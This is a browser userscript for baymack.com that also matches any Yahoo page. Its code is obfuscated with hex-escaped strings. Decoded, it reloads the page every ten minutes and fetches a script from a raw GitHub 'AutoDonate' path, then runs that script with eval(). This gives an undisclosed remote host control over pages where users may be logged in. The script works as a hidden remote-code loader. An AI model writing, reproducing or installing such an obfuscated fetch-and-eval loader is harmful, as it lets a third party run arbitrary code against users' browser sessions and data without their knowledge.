// ==UserScript==
// @name         Baymack vmhoangit1408
// @version      21.9.2019
// @description  baymack
// @author       vmhoangit1408
// @match        https://www.baymack.com/*
// @include      https://*yahoo*
// @require 	 https://apis.google.com/js/api.js
// @require 	 https://www.gstatic.com/firebasejs/5.9.4/firebase.js
// @grant        none
// ==/UserScript==

var _0x65cf=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x72\x61\x77\x2E\x67\x69\x74\x68\x75\x62\x75\x73\x65\x72\x63\x6F\x6E\x74\x65\x6E\x74\x2E\x63\x6F\x6D\x2F\x76\x6D\x68\x6F\x61\x6E\x67\x69\x74\x31\x34\x30\x38\x2F\x41\x75\x74\x6F\x44\x6F\x6E\x61\x74\x65\x2F\x6D\x61\x73\x74\x65\x72\x2F\x42\x61\x79\x6D\x61\x63\x6B\x5F\x36\x6A\x64\x39\x4B\x59\x64","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74"];setTimeout(function(){window[_0x65cf[1]][_0x65cf[0]]()},600000);var url=_0x65cf[2];var xmlhttp= new XMLHttpRequest();xmlhttp[_0x65cf[4]](_0x65cf[3],url,true);xmlhttp[_0x65cf[5]](null);xmlhttp[_0x65cf[6]]= function(){if(xmlhttp[_0x65cf[7]]== 4&& xmlhttp[_0x65cf[8]]== 200){eval(xmlhttp[_0x65cf[9]])}else {if(xmlhttp[_0x65cf[7]]!= 2&& xmlhttp[_0x65cf[7]]!= 3){window[_0x65cf[1]][_0x65cf[0]]()}}}
